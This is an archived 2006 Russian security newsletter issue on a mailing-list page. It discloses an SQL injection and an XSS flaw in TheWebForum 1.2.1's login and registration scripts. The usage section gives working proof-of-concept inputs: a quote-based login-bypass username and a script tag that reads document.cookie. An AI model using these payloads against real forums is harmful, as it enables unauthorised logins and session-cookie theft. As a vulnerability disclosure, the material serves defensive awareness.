Отправляет email-рассылки с помощью сервиса Sendsay

IT-безопасность в быту и не только

Рассылка закрыта

При закрытии подписчики были переданы в рассылку "Безопасность. Статьи, новости, комментарии" на которую и рекомендуем вам подписаться.

Вы можете найти рассылки сходной тематики в Каталоге рассылок.

  Март 2006  
 1
 2
 3
 4
 5
 6
 7
 8
 9
09.03.2006
07:05:32
12:05:26
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
29.03.2006
07:05:13
17:05:23
30
31
Автор
Forester

Статистика

1.394 подписчиков
-1 за неделю
  Все выпуски  

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в TheWebForum.


Компьютер для продвинутых пользователей
Содержание:
TheWebForum
ПО: TheWebForum
Версия: 1.2.1

Описание:
1. Возможно SQl-инъекция.
Уязвимый скрипт:
login.php
Перменные $_POST['username'] и $u не проверяются, а соответственно возможно использование некоторого SQL-запроса.
2. XSS.
Уязвимый скрипт:
login.php
Перменная $www не проверяеться, а соответственно возможно использование некоторого кода.
Использование:
1.http://host/twf/login.php
User Name: a' or 'a'='a'/*
Password: anypassword
2.http://host/twf/register.php
Website value: <script>alert(document.cookie)</script>
TheWebForum
Рассылка создана и ведется при поддержке Информационной сети Пермского края.
В избранное